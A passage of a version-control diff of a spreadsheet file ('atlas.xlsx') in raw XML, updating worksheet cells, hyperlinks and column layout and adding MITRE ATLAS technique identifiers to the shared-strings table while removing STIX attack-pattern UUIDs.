-      <c r="E21" s="2" t="s">
-        <v>598</v>
-      </c>
-      <c r="F21" t="s">
-        <v>419</v>
-      </c>
-      <c r="G21" t="s">
-        <v>419</v>
+      <c r="B25" t="s">
+        <v>604</v>
+      </c>
+      <c r="C25" t="s">
+        <v>630</v>
+      </c>
+      <c r="D25" t="s">
+        <v>656</v>
+      </c>
+      <c r="E25" s="2" t="s">
+        <v>682</v>
+      </c>
+      <c r="F25" t="s">
+        <v>685</v>
+      </c>
+      <c r="G25" t="s">
+        <v>471</v>
+      </c>
+    </row>
+    <row r="26" spans="1:7">
+      <c r="A26" t="s">
+        <v>579</v>
+      </c>
+      <c r="B26" t="s">
+        <v>605</v>
+      </c>
+      <c r="C26" t="s">
+        <v>631</v>
+      </c>
+      <c r="D26" t="s">
+        <v>657</v>
+      </c>
+      <c r="E26" s="2" t="s">
+        <v>683</v>
+      </c>
+      <c r="F26" t="s">
+        <v>685</v>
+      </c>
+      <c r="G26" t="s">
+        <v>472</v>
+      </c>
+    </row>
+    <row r="27" spans="1:7">
+      <c r="A27" t="s">
+        <v>580</v>
+      </c>
+      <c r="B27" t="s">
+        <v>606</v>
+      </c>
+      <c r="C27" t="s">
+        <v>632</v>
+      </c>
+      <c r="D27" t="s">
+        <v>658</v>
+      </c>
+      <c r="E27" s="2" t="s">
+        <v>684</v>
+      </c>
+      <c r="F27" t="s">
+        <v>685</v>
+      </c>
+      <c r="G27" t="s">
+        <v>471</v>
       </c>
     </row>
   </sheetData>
@@ -5975,6 +6650,12 @@
     <hyperlink ref="E19" r:id="rId18"/>
     <hyperlink ref="E20" r:id="rId19"/>
     <hyperlink ref="E21" r:id="rId20"/>
+    <hyperlink ref="E22" r:id="rId21"/>
+    <hyperlink ref="E23" r:id="rId22"/>
+    <hyperlink ref="E24" r:id="rId23"/>
+    <hyperlink ref="E25" r:id="rId24"/>
+    <hyperlink ref="E26" r:id="rId25"/>
+    <hyperlink ref="E27" r:id="rId26"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
@@ -5982,7 +6663,7 @@
 
 <file path=xl/worksheets/sheet4.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:X12"/>
+  <dimension ref="A1:Y13"/>
   <sheetViews>
     <sheetView workbookViewId="0"/>
   </sheetViews>
@@ -6003,420 +6684,454 @@
     <col min="13" max="13" width="20.7109375" style="4" customWidth="1"/>
     <col min="14" max="14" width="20.7109375" style="3" customWidth="1"/>
     <col min="15" max="15" width="20.7109375" style="4" customWidth="1"/>
-    <col min="16" max="18" width="20.7109375" customWidth="1"/>
-    <col min="19" max="19" width="20.7109375" style="3" customWidth="1"/>
-    <col min="20" max="20" width="20.7109375" style="4" customWidth="1"/>
-    <col min="21" max="21" width="20.7109375" style="3" customWidth="1"/>
-    <col min="22" max="22" width="20.7109375" style="4" customWidth="1"/>
-    <col min="23" max="23" width="20.7109375" style="3" customWidth="1"/>
-    <col min="24" max="24" width="20.7109375" style="4" customWidth="1"/>
-    <col min="25" max="25" width="20.7109375" customWidth="1"/>
+    <col min="16" max="16" width="20.7109375" customWidth="1"/>
+    <col min="17" max="17" width="20.7109375" style="3" customWidth="1"/>
+    <col min="18" max="18" width="20.7109375" style="4" customWidth="1"/>
+    <col min="19" max="19" width="20.7109375" customWidth="1"/>
+    <col min="20" max="20" width="20.7109375" style="3" customWidth="1"/>
+    <col min="21" max="21" width="20.7109375" style="4" customWidth="1"/>
+    <col min="22" max="22" width="20.7109375" style="3" customWidth="1"/>
+    <col min="23" max="23" width="20.7109375" style="4" customWidth="1"/>
+    <col min="24" max="24" width="20.7109375" style="3" customWidth="1"/>
+    <col min="25" max="25" width="20.7109375" style="4" customWidth="1"/>
+    <col min="26" max="26" width="20.7109375" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:24">
+    <row r="1" spans="1:25">
       <c r="A1" s="5" t="s">
-        <v>421</v>
+        <v>477</v>
       </c>
       <c r="B1" s="5"/>
       <c r="C1" s="5" t="s">
-        <v>420</v>
+        <v>476</v>
       </c>
       <c r="D1" s="5"/>
       <c r="E1" s="5" t="s">
-        <v>426</v>
+        <v>482</v>
       </c>
       <c r="F1" s="5"/>
       <c r="G1" s="1" t="s">
-        <v>432</v>
+        <v>475</v>
       </c>
       <c r="H1" s="5" t="s">
-        <v>424</v>
+        <v>480</v>
       </c>
       <c r="I1" s="5"/>
       <c r="J1" s="5" t="s">
-        <v>468</v>
+        <v>491</v>
       </c>
       <c r="K1" s="5"/>
       <c r="L1" s="5" t="s">
-        <v>469</v>
+        <v>524</v>
       </c>
       <c r="M1" s="5"/>
       <c r="N1" s="5" t="s">
-        <v>467</v>
+        <v>523</v>
       </c>
       <c r="O1" s="5"/>
       <c r="P1" s="1" t="s">
-        <v>437</v>
-      </c>
-      <c r="Q1" s="1" t="s">
-        <v>429</v>
-      </c>
-      <c r="R1" s="1" t="s">
-        <v>427</v>
-      </c>
-      <c r="S1" s="5" t="s">
-        <v>423</v>
-      </c>
-      <c r="T1" s="5"/>
-      <c r="U1" s="5" t="s">
-        <v>431</v>
-      </c>
-      <c r="V1" s="5"/>
-      <c r="W1" s="5" t="s">
-        <v>425</v>
-      </c>
-      <c r="X1" s="5"/>
-    </row>
-    <row r="2" spans="1:24">
+        <v>493</v>
+      </c>
+      <c r="Q1" s="5" t="s">
+        <v>485</v>
+      </c>
+      <c r="R1" s="5"/>
+      <c r="S1" s="1" t="s">
+        <v>483</v>
+      </c>
+      <c r="T1" s="5" t="s">
+        <v>479</v>
+      </c>
+      <c r="U1" s="5"/>
+      <c r="V1" s="5" t="s">
+        <v>487</v>
+      </c>
+      <c r="W1" s="5"/>
+      <c r="X1" s="5" t="s">
+        <v>481</v>
+      </c>
+      <c r="Y1" s="5"/>
+    </row>
+    <row r="2" spans="1:25">
       <c r="A2" s="3" t="s">
-        <v>175</v>
+        <v>194</v>
       </c>
       <c r="C2" s="6" t="s">
-        <v>173</v>
+        <v>192</v>
       </c>
       <c r="D2" s="4" t="s">
-        <v>182</v>
+        <v>201</v>
       </c>
       <c r="E2" s="3" t="s">
-        <v>198</v>
+        <v>221</v>
       </c>
       <c r="G2" t="s">
-        <v>205</v>
+        <v>191</v>
       </c>
       <c r="H2" s="3" t="s">
-        <v>181</v>
+        <v>200</v>
       </c>
       <c r="J2" s="6" t="s">
-        <v>178</v>
+        <v>197</v>
       </c>
       <c r="K2" s="4" t="s">
-        <v>209</v>
+        <v>232</v>
       </c>
       <c r="L2" s="3" t="s">
-        <v>214</v>
+        <v>237</v>
       </c>
       <c r="N2" s="3" t="s">
-        <v>198</v>
+        <v>221</v>
       </c>
       <c r="P2" t="s">
-        <v>248</v>
-      </c>
-      <c r="Q2" t="s">
-        <v>193</v>
-      </c>
-      <c r="R2" t="s">
-        <v>187</v>
-      </c>
-      <c r="S2" s="6" t="s">
-        <v>178</v>
-      </c>
-      <c r="T2" s="4" t="s">
-        <v>209</v>
-      </c>
-      <c r="U2" s="3" t="s">
-        <v>199</v>
-      </c>
-      <c r="W2" s="3" t="s">
-        <v>183</v>
-      </c>
-    </row>
-    <row r="3" spans="1:24">
+        <v>275</v>
+      </c>
+      <c r="Q2" s="3" t="s">
+        <v>212</v>
+      </c>
+      <c r="S2" t="s">
+        <v>206</v>
+      </c>
+      <c r="T2" s="6" t="s">
+        <v>197</v>
+      </c>
+      <c r="U2" s="4" t="s">
+        <v>232</v>
+      </c>
+      <c r="V2" s="3" t="s">
+        <v>222</v>
+      </c>
+      <c r="X2" s="3" t="s">
+        <v>202</v>
+      </c>
+    </row>
+    <row r="3" spans="1:25">
       <c r="A3" s="3" t="s">
-        <v>236</v>
+        <v>263</v>
       </c>
       <c r="C3" s="6"/>
       <c r="D3" s="4" t="s">
-        <v>219</v>
+        <v>243</v>
       </c>
       <c r="E3" s="3" t="s">
-        <v>201</v>
+        <v>224</v>
       </c>
       <c r="G3" t="s">
-        <v>221</v>
+        <v>228</v>
       </c>
       <c r="H3" s="3" t="s">
-        <v>216</v>
+        <v>239</v>
       </c>
       <c r="J3" s="6"/>
       <c r="K3" s="4" t="s">
+        <v>256</v>
+      </c>
+      <c r="L3" s="3" t="s">
+        <v>239</v>
+      </c>
+      <c r="N3" s="3" t="s">
+        <v>237</v>
+      </c>
+      <c r="Q3" s="6" t="s">
+        <v>213</v>
+      </c>
+      <c r="R3" s="4" t="s">
+        <v>217</v>
+      </c>
+      <c r="S3" t="s">
+        <v>207</v>
+      </c>
+      <c r="T3" s="6"/>
+      <c r="U3" s="4" t="s">
+        <v>256</v>
+      </c>
+      <c r="V3" s="6" t="s">
+        <v>223</v>
+      </c>
+      <c r="W3" s="4" t="s">
+        <v>226</v>
+      </c>
+      <c r="X3" s="3" t="s">
+        <v>209</v>
+      </c>
+    </row>
+    <row r="4" spans="1:25">
+      <c r="A4" s="3" t="s">
+        <v>264</v>
+      </c>
+      <c r="C4" s="6" t="s">
+        <v>193</v>
+      </c>
+      <c r="D4" s="4" t="s">
+        <v>208</v>
+      </c>
+      <c r="E4" s="6" t="s">
+        <v>240</v>
+      </c>
+      <c r="F4" s="4" t="s">
+        <v>211</v>
+      </c>
+      <c r="G4" t="s">
+        <v>247</v>
+      </c>
+      <c r="H4" s="3" t="s">
+        <v>277</v>
+      </c>
+      <c r="I4" s="4" t="s">
+        <v>274</v>
+      </c>
+      <c r="J4" s="6" t="s">
+        <v>240</v>
+      </c>
+      <c r="K4" s="4" t="s">
+        <v>211</v>
+      </c>
+      <c r="L4" s="6" t="s">
+        <v>240</v>
+      </c>
+      <c r="M4" s="4" t="s">
+        <v>211</v>
+      </c>
+      <c r="N4" s="6" t="s">
+        <v>240</v>
+      </c>
+      <c r="O4" s="4" t="s">
+        <v>211</v>
+      </c>
+      <c r="Q4" s="6"/>
+      <c r="R4" s="4" t="s">
+        <v>254</v>
+      </c>
+      <c r="S4" t="s">
+        <v>242</v>
+      </c>
+      <c r="T4" s="6" t="s">
+        <v>203</v>
+      </c>
+      <c r="U4" s="4" t="s">
+        <v>198</v>
+      </c>
+      <c r="V4" s="6"/>
+      <c r="W4" s="4" t="s">
         <v>231</v>
       </c>
-      <c r="L3" s="3" t="s">
-        <v>216</v>
-      </c>
-      <c r="N3" s="3" t="s">
-        <v>214</v>
-      </c>
-      <c r="Q3" t="s">
-        <v>194</v>
-      </c>
-      <c r="R3" t="s">
-        <v>188</v>
-      </c>
-      <c r="S3" s="6"/>
-      <c r="T3" s="4" t="s">
-        <v>231</v>
-      </c>
-      <c r="U3" s="6" t="s">
-        <v>200</v>
-      </c>
-      <c r="V3" s="4" t="s">
-        <v>203</v>
-      </c>
-      <c r="W3" s="3" t="s">
-        <v>190</v>
-      </c>
-    </row>
-    <row r="4" spans="1:24">
-      <c r="A4" s="3" t="s">
-        <v>237</v>
-      </c>
-      <c r="C4" s="6" t="s">
-        <v>174</v>
-      </c>
-      <c r="D4" s="4" t="s">
-        <v>189</v>
-      </c>
-      <c r="E4" s="6" t="s">
-        <v>217</v>
-      </c>
-      <c r="F4" s="4" t="s">
-        <v>192</v>
-      </c>
-      <c r="G4" t="s">
-        <v>224</v>
-      </c>
-      <c r="H4" s="3" t="s">
-        <v>250</v>
-      </c>
-      <c r="I4" s="4" t="s">
-        <v>247</v>
-      </c>
-      <c r="J4" s="6" t="s">
-        <v>217</v>
-      </c>
-      <c r="K4" s="4" t="s">
-        <v>192</v>
-      </c>
-      <c r="L4" s="6" t="s">
-        <v>217</v>
-      </c>
-      <c r="M4" s="4" t="s">
-        <v>192</v>
-      </c>
-      <c r="N4" s="6" t="s">
-        <v>217</v>
-      </c>
-      <c r="O4" s="4" t="s">
-        <v>192</v>
-      </c>
-      <c r="Q4" t="s">
-        <v>195</v>
-      </c>
-      <c r="R4" t="s">
+      <c r="X4" s="3" t="s">
         <v>218</v>
       </c>
-      <c r="S4" s="6" t="s">
-        <v>184</v>
-      </c>
-      <c r="T4" s="4" t="s">
-        <v>179</v>
-      </c>
-      <c r="U4" s="6"/>
-      <c r="V4" s="4" t="s">
-        <v>208</v>
-      </c>
-      <c r="W4" s="3" t="s">
-        <v>196</v>
-      </c>
-    </row>
-    <row r="5" spans="1:24">
+      <c r="Y4" s="4" t="s">
+        <v>248</v>
+      </c>
+    </row>
+    <row r="5" spans="1:25">
       <c r="A5" s="3" t="s">
-        <v>238</v>
+        <v>265</v>
       </c>
       <c r="C5" s="6"/>
       <c r="D5" s="4" t="s">
-        <v>227</v>
+        <v>251</v>
       </c>
       <c r="E5" s="6"/>
       <c r="F5" s="4" t="s">
-        <v>207</v>
+        <v>230</v>
       </c>
       <c r="G5" t="s">
-        <v>230</v>
+        <v>255</v>
       </c>
       <c r="J5" s="6"/>
       <c r="K5" s="4" t="s">
-        <v>207</v>
+        <v>230</v>
       </c>
       <c r="L5" s="6"/>
       <c r="M5" s="4" t="s">
-        <v>207</v>
+        <v>230</v>
       </c>
       <c r="N5" s="6"/>
       <c r="O5" s="4" t="s">
-        <v>207</v>
-      </c>
-      <c r="Q5" t="s">
+        <v>230</v>
+      </c>
+      <c r="Q5" s="3" t="s">
+        <v>214</v>
+      </c>
+      <c r="T5" s="6"/>
+      <c r="U5" s="4" t="s">
+        <v>199</v>
+      </c>
+      <c r="V5" s="6"/>
+      <c r="W5" s="4" t="s">
+        <v>234</v>
+      </c>
+      <c r="X5" s="3" t="s">
+        <v>219</v>
+      </c>
+    </row>
+    <row r="6" spans="1:25">
+      <c r="A6" s="6" t="s">
+        <v>266</v>
+      </c>
+      <c r="B6" s="4" t="s">
+        <v>235</v>
+      </c>
+      <c r="C6" s="3" t="s">
+        <v>210</v>
+      </c>
+      <c r="D6" s="4" t="s">
+        <v>196</v>
+      </c>
+      <c r="E6" s="6" t="s">
+        <v>246</v>
+      </c>
+      <c r="F6" s="4" t="s">
+        <v>205</v>
+      </c>
+      <c r="J6" s="3" t="s">
+        <v>241</v>
+      </c>
+      <c r="Q6" s="3" t="s">
         <v>215</v>
       </c>
-      <c r="S5" s="6"/>
-      <c r="T5" s="4" t="s">
-        <v>180</v>
-      </c>
-      <c r="U5" s="6"/>
-      <c r="V5" s="4" t="s">
-        <v>211</v>
-      </c>
-      <c r="W5" s="3" t="s">
-        <v>198</v>
-      </c>
-    </row>
-    <row r="6" spans="1:24">
-      <c r="A6" s="6" t="s">
-        <v>239</v>
-      </c>
-      <c r="B6" s="4" t="s">
-        <v>212</v>
-      </c>
-      <c r="C6" s="3" t="s">
-        <v>191</v>
-      </c>
-      <c r="D6" s="4" t="s">
-        <v>177</v>
-      </c>
-      <c r="E6" s="6" t="s">
-        <v>223</v>
-      </c>
-      <c r="F6" s="4" t="s">
-        <v>186</v>
-      </c>
-      <c r="J6" s="3" t="s">
-        <v>232</v>
-      </c>
-      <c r="S6" s="6"/>
-      <c r="T6" s="4" t="s">
-        <v>210</v>
-      </c>
-      <c r="U6" s="3" t="s">
-        <v>213</v>
-      </c>
-      <c r="W6" s="6" t="s">
-        <v>202</v>
-      </c>
-      <c r="X6" s="4" t="s">
-        <v>204</v>
-      </c>
-    </row>
-    <row r="7" spans="1:24">
+      <c r="T6" s="6"/>
+      <c r="U6" s="4" t="s">
+        <v>233</v>
+      </c>
+      <c r="V6" s="3" t="s">
+        <v>236</v>
+      </c>
+      <c r="X6" s="3" t="s">
+        <v>221</v>
+      </c>
+    </row>
+    <row r="7" spans="1:25">
       <c r="A7" s="6"/>
       <c r="B7" s="4" t="s">
-        <v>233</v>
+        <v>258</v>
       </c>
       <c r="C7" s="3" t="s">
-        <v>197</v>
+        <v>220</v>
       </c>
       <c r="E7" s="6"/>
       <c r="F7" s="4" t="s">
-        <v>206</v>
-      </c>
-      <c r="S7" s="6"/>
-      <c r="T7" s="4" t="s">
+        <v>229</v>
+      </c>
+      <c r="J7" s="3" t="s">
+        <v>257</v>
+      </c>
+      <c r="Q7" s="3" t="s">
+        <v>216</v>
+      </c>
+      <c r="T7" s="6"/>
+      <c r="U7" s="4" t="s">
+        <v>249</v>
+      </c>
+      <c r="V7" s="3" t="s">
+        <v>238</v>
+      </c>
+      <c r="X7" s="6" t="s">
         <v>225</v>
       </c>
-      <c r="U7" s="3" t="s">
-        <v>215</v>
-      </c>
-      <c r="W7" s="6"/>
-      <c r="X7" s="4" t="s">
-        <v>220</v>
-      </c>
-    </row>
-    <row r="8" spans="1:24">
+      <c r="Y7" s="4" t="s">
+        <v>227</v>
+      </c>
+    </row>
+    <row r="8" spans="1:25">
       <c r="A8" s="6"/>
       <c r="B8" s="4" t="s">
-        <v>244</v>
+        <v>271</v>
       </c>
       <c r="C8" s="6" t="s">
-        <v>228</v>
+        <v>252</v>
       </c>
       <c r="D8" s="4" t="s">
-        <v>176</v>
+        <v>195</v>
       </c>
       <c r="E8" s="6"/>
       <c r="F8" s="4" t="s">
-        <v>222</v>
-      </c>
-      <c r="S8" s="6"/>
-      <c r="T8" s="4" t="s">
-        <v>254</v>
-      </c>
-      <c r="W8" s="6"/>
-      <c r="X8" s="4" t="s">
-        <v>235</v>
-      </c>
-    </row>
-    <row r="9" spans="1:24">
+        <v>245</v>
+      </c>
+      <c r="Q8" s="3" t="s">
+        <v>238</v>
+      </c>
+      <c r="T8" s="6"/>
+      <c r="U8" s="4" t="s">
+        <v>281</v>
+      </c>
+      <c r="X8" s="6"/>
+      <c r="Y8" s="4" t="s">
+        <v>244</v>
+      </c>
+    </row>
+    <row r="9" spans="1:25">
       <c r="C9" s="6"/>
       <c r="D9" s="4" t="s">
-        <v>241</v>
+        <v>268</v>
       </c>
       <c r="E9" s="6"/>
       <c r="F9" s="4" t="s">
-        <v>226</v>
-      </c>
-      <c r="S9" s="6" t="s">
-        <v>185</v>
-      </c>
-      <c r="T9" s="4" t="s">
-        <v>245</v>
-      </c>
-      <c r="W9" s="6"/>
-      <c r="X9" s="4" t="s">
-        <v>240</v>
-      </c>
-    </row>
-    <row r="10" spans="1:24">
+        <v>250</v>
+      </c>
+      <c r="T9" s="6" t="s">
+        <v>204</v>
+      </c>
+      <c r="U9" s="4" t="s">
+        <v>272</v>
+      </c>
+      <c r="X9" s="6"/>
+      <c r="Y9" s="4" t="s">
+        <v>262</v>
+      </c>
+    </row>
+    <row r="10" spans="1:25">
       <c r="C10" s="3" t="s">
-        <v>232</v>
+        <v>257</v>
       </c>
       <c r="E10" s="3" t="s">
-        <v>229</v>
+        <v>253</v>
       </c>
       <c r="F10" s="4" t="s">
-        <v>243</v>
-      </c>
-      <c r="S10" s="6"/>
-      <c r="T10" s="4" t="s">
-        <v>246</v>
-      </c>
-      <c r="W10" s="6"/>
-      <c r="X10" s="4" t="s">
-        <v>251</v>
-      </c>
-    </row>
-    <row r="11" spans="1:24">
+        <v>270</v>
+      </c>
+      <c r="T10" s="6"/>
+      <c r="U10" s="4" t="s">
+        <v>273</v>
+      </c>
+      <c r="X10" s="6"/>
+      <c r="Y10" s="4" t="s">
+        <v>267</v>
+      </c>
+    </row>
+    <row r="11" spans="1:25">
       <c r="C11" s="3" t="s">
-        <v>234</v>
+        <v>259</v>
       </c>
       <c r="E11" s="3" t="s">
-        <v>252</v>
-      </c>
-      <c r="S11" s="6"/>
-      <c r="T11" s="4" t="s">
-        <v>249</v>
-      </c>
-      <c r="W11" s="3" t="s">
-        <v>242</v>
-      </c>
-    </row>
-    <row r="12" spans="1:24">
-      <c r="S12" s="3" t="s">
-        <v>253</v>
+        <v>279</v>
+      </c>
+      <c r="T11" s="6"/>
+      <c r="U11" s="4" t="s">
+        <v>276</v>
+      </c>
+      <c r="X11" s="6"/>
+      <c r="Y11" s="4" t="s">
+        <v>278</v>
+      </c>
+    </row>
+    <row r="12" spans="1:25">
+      <c r="C12" s="3" t="s">
+        <v>260</v>
+      </c>
+      <c r="T12" s="3" t="s">
+        <v>280</v>
+      </c>
+      <c r="X12" s="3" t="s">
+        <v>269</v>
+      </c>
+    </row>
+    <row r="13" spans="1:25">
+      <c r="C13" s="3" t="s">
+        <v>261</v>
       </c>
     </row>
   </sheetData>
-  <mergeCells count="25">
+  <mergeCells count="27">
     <mergeCell ref="A6:A8"/>
     <mergeCell ref="A1:B1"/>
     <mergeCell ref="C2:C3"/>
@@ -6434,14 +7149,16 @@
     <mergeCell ref="L1:M1"/>
     <mergeCell ref="N4:N5"/>
     <mergeCell ref="N1:O1"/>
-    <mergeCell ref="S2:S3"/>
-    <mergeCell ref="S4:S8"/>
-    <mergeCell ref="S9:S11"/>
-    <mergeCell ref="S1:T1"/>
-    <mergeCell ref="U3:U5"/>
-    <mergeCell ref="U1:V1"/>
-    <mergeCell ref="W6:W10"/>
-    <mergeCell ref="W1:X1"/>
+    <mergeCell ref="Q3:Q4"/>
+    <mergeCell ref="Q1:R1"/>
+    <mergeCell ref="T2:T3"/>
+    <mergeCell ref="T4:T8"/>
+    <mergeCell ref="T9:T11"/>
+    <mergeCell ref="T1:U1"/>
+    <mergeCell ref="V3:V5"/>
+    <mergeCell ref="V1:W1"/>
+    <mergeCell ref="X7:X11"/>
+    <mergeCell ref="X1:Y1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1273" uniqueCount="686">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1390" uniqueCount="737">
   <si>
     <t>ID</t>
   </si>
@@ -73,6 +73,9 @@
     <t>AML.T0043.002</t>
   </si>
   <si>
+    <t>AML.T0067.000</t>
+  </si>
+  <si>
     <t>AML.T0050</t>
   </si>
   <si>
@@ -115,6 +118,9 @@
     <t>AML.T0062</t>
   </si>
   <si>
+    <t>AML.T0069</t>
+  </si>
+  <si>
     <t>AML.T0007</t>
   </si>
   <si>
@@ -151,15 +157,27 @@
     <t>AML.T0048</t>
   </si>
   <si>
+    <t>AML.T0056</t>
+  </si>
+  <si>
     <t>AML.T0024.002</t>
   </si>
   <si>
+    <t>AML.T0071</t>
+  </si>
+  <si>
     <t>AML.T0048.000</t>
   </si>
   <si>
     <t>AML.T0044</t>
   </si>
   <si>
+    <t>AML.T0064</t>
+  </si>
+  <si>
+    <t>AML.T0016.002</t>
+  </si>
+  <si>
     <t>AML.T0010.000</t>
   </si>
   <si>
@@ -187,18 +205,24 @@
     <t>AML.T0054</t>
   </si>
   <si>
-    <t>AML.T0056</t>
-  </si>
-  <si>
     <t>AML.T0053</t>
   </si>
   <si>
+    <t>AML.T0065</t>
+  </si>
+  <si>
     <t>AML.T0051</t>
   </si>
   <si>
+    <t>AML.T0068</t>
+  </si>
+  <si>
     <t>AML.T0061</t>
   </si>
   <si>
+    <t>AML.T0067</t>
+  </si>
+  <si>
     <t>AML.T0035</t>
   </si>
   <si>
@@ -259,9 +283,15 @@
     <t>AML.T0058</t>
   </si>
   <si>
+    <t>AML.T0070</t>
+  </si>
+  <si>
     <t>AML.T0048.001</t>
   </si>
   <si>
+    <t>AML.T0066</t>
+  </si>
+  <si>
     <t>AML.T0004</t>
   </si>
   <si>
@@ -286,6 +316,15 @@
     <t>AML.T0052.000</t>
   </si>
   <si>
+    <t>AML.T0069.000</t>
+  </si>
+  <si>
+    <t>AML.T0069.001</t>
+  </si>
+  <si>
+    <t>AML.T0069.002</t>
+  </si>
+  <si>
     <t>AML.T0000.002</t>
   </si>
   <si>
@@ -319,277 +358,316 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--90a420d4-3f03-4800-86c0-223c4376804a</t>
-  </si>
-  <si>
-    <t>attack-pattern--01203e88-6c9a-4611-b278-7ba3c604a234</t>
-  </si>
-  <si>
-    <t>attack-pattern--aa17fe8d-62f8-4c4c-b7a2-6858c82dd84b</t>
-  </si>
-  <si>
-    <t>attack-pattern--79460396-01b4-4e91-8695-7d26df1abb95</t>
-  </si>
-  <si>
-    <t>attack-pattern--3250c828-3852-4efb-857d-f7ca5c1a1ebc</t>
-  </si>
-  <si>
-    <t>attack-pattern--4f0f548a-5f39-4dc7-b5e6-c84d824e39bd</t>
-  </si>
-  <si>
-    <t>attack-pattern--c704a49c-abf0-4258-9919-a862b1865469</t>
-  </si>
-  <si>
-    <t>attack-pattern--c4e52005-7416-45c4-9feb-8cd5fd34f70a</t>
-  </si>
-  <si>
-    <t>attack-pattern--241ad2a0-3fe2-4912-bb77-b79cee573fd2</t>
-  </si>
-  <si>
-    <t>attack-pattern--716d3a6b-2f8c-4a1f-85f7-d884bb7b2800</t>
-  </si>
-  <si>
-    <t>attack-pattern--c90d78ed-0f2f-41e9-b85f-1d13be7a40f6</t>
-  </si>
-  <si>
-    <t>attack-pattern--ae71ca3a-8ca4-40d2-bdba-4276b29ac8f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--a7c30122-b393-4265-91b7-57cd1211e3f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--c2bd321e-e196-4954-a8e9-c22f1793acc7</t>
-  </si>
-  <si>
-    <t>attack-pattern--8d644240-ad99-4410-a7f8-3ef8f53a463e</t>
-  </si>
-  <si>
-    <t>attack-pattern--9f998b9a-d20e-48e7-bee5-034ed5a696dd</t>
-  </si>
-  <si>
-    <t>attack-pattern--a7f17bbd-e2fd-4413-89e1-a5e5226cc23c</t>
-  </si>
-  <si>
-    <t>attack-pattern--a3baff3d-7228-4ab7-ae00-ffe150e7ef8a</t>
-  </si>
-  <si>
-    <t>attack-pattern--8f644f37-e2e6-468e-b720-f395b8c27fbc</t>
-  </si>
-  <si>
-    <t>attack-pattern--c9153697-7d92-43aa-a16e-38436beff79d</t>
-  </si>
-  <si>
-    <t>attack-pattern--d911e8cb-0601-42f1-90de-7ce0b21cd578</t>
-  </si>
-  <si>
-    <t>attack-pattern--0926acf1-f3e0-40ef-af0d-89515371bf89</t>
-  </si>
-  <si>
-    <t>attack-pattern--782c346d-9af5-4145-b6c6-b9cccdc2c950</t>
-  </si>
-  <si>
-    <t>attack-pattern--6a88dccb-fb37-4f11-a5ad-42908aaee1d0</t>
-  </si>
-  <si>
-    <t>attack-pattern--c552f0b5-2e2c-4f8f-badc-0876ecca7255</t>
-  </si>
-  <si>
-    <t>attack-pattern--943303ef-846b-49d6-b53f-b0b9341ac1ca</t>
-  </si>
-  <si>
-    <t>attack-pattern--dd88c52a-ec0f-42fa-8622-f992d6bcf2d5</t>
-  </si>
-  <si>
-    <t>attack-pattern--89731d07-679e-4da3-8f70-aba314068a89</t>
-  </si>
-  <si>
-    <t>attack-pattern--8735735d-c09d-4298-8e64-9a2b6168a74c</t>
-  </si>
-  <si>
-    <t>attack-pattern--aaa79096-814f-4fb0-a553-1701b2765317</t>
-  </si>
-  <si>
-    <t>attack-pattern--071df654-813a-4708-85dc-f715f785d37f</t>
-  </si>
-  <si>
-    <t>attack-pattern--2680aa95-5620-4677-9c62-b0c3d15d9450</t>
-  </si>
-  <si>
-    <t>attack-pattern--b07d147f-51c8-4eb6-9a05-09c86762a9c1</t>
-  </si>
-  <si>
-    <t>attack-pattern--47d73872-5336-44f7-81e3-d30bc7e039dd</t>
-  </si>
-  <si>
-    <t>attack-pattern--ba500f0e-52ca-40ff-aed4-e6dbf00cca10</t>
-  </si>
-  <si>
-    <t>attack-pattern--f78e0ac3-6d72-42ed-b20a-e10d8c752cf6</t>
-  </si>
-  <si>
-    <t>attack-pattern--4b1c5ebf-e05d-414d-a557-5c29f505f589</t>
-  </si>
-  <si>
-    <t>attack-pattern--3de90963-bc9f-4ae1-b780-7d05e46eacdd</t>
-  </si>
-  <si>
-    <t>attack-pattern--8dfc1d73-0de8-4daa-a8cf-83e019347395</t>
-  </si>
-  <si>
-    <t>attack-pattern--a4a55526-2f1f-403b-9691-609e46381e17</t>
-  </si>
-  <si>
-    <t>attack-pattern--86b5f486-afb8-4aa9-991f-0e24d5737f0c</t>
-  </si>
-  <si>
-    <t>attack-pattern--a50f02df-1130-4945-94bb-7857952da585</t>
-  </si>
-  <si>
-    <t>attack-pattern--b15151a4-d832-46b0-8ddd-14dad0b67afc</t>
-  </si>
-  <si>
-    <t>attack-pattern--e19c6f8a-f1e2-46cc-9387-03a3092f01ed</t>
-  </si>
-  <si>
-    <t>attack-pattern--a17a1941-ca02-4273-9d7f-d864ea122bdb</t>
-  </si>
-  <si>
-    <t>attack-pattern--45d378aa-20ae-401d-bf61-7f00104eeaca</t>
-  </si>
-  <si>
-    <t>attack-pattern--172427e3-9ecc-49a3-b628-96b824cc4131</t>
-  </si>
-  <si>
-    <t>attack-pattern--e98acce8-ed69-4ebe-845b-1bcb662836ba</t>
-  </si>
-  <si>
-    <t>attack-pattern--adbb0dd5-ff66-4b2f-869f-bfb3fdb45fc8</t>
-  </si>
-  <si>
-    <t>attack-pattern--19cd2d12-66ff-487c-a05c-e058b027efc9</t>
-  </si>
-  <si>
-    <t>attack-pattern--f16a79dd-95ff-4eb7-a986-18a727c4fc9d</t>
-  </si>
-  <si>
-    <t>attack-pattern--e2ebc190-9ff6-496e-afeb-ac868df2361e</t>
-  </si>
-  <si>
-    <t>attack-pattern--d65acc80-abf9-4147-a612-6536d31c5a91</t>
-  </si>
-  <si>
-    <t>attack-pattern--d1f013a8-11f3-4560-831c-8ed5e39247c9</t>
-  </si>
-  <si>
-    <t>attack-pattern--d8292a1c-21e7-4b45-b110-0e05feb30a9a</t>
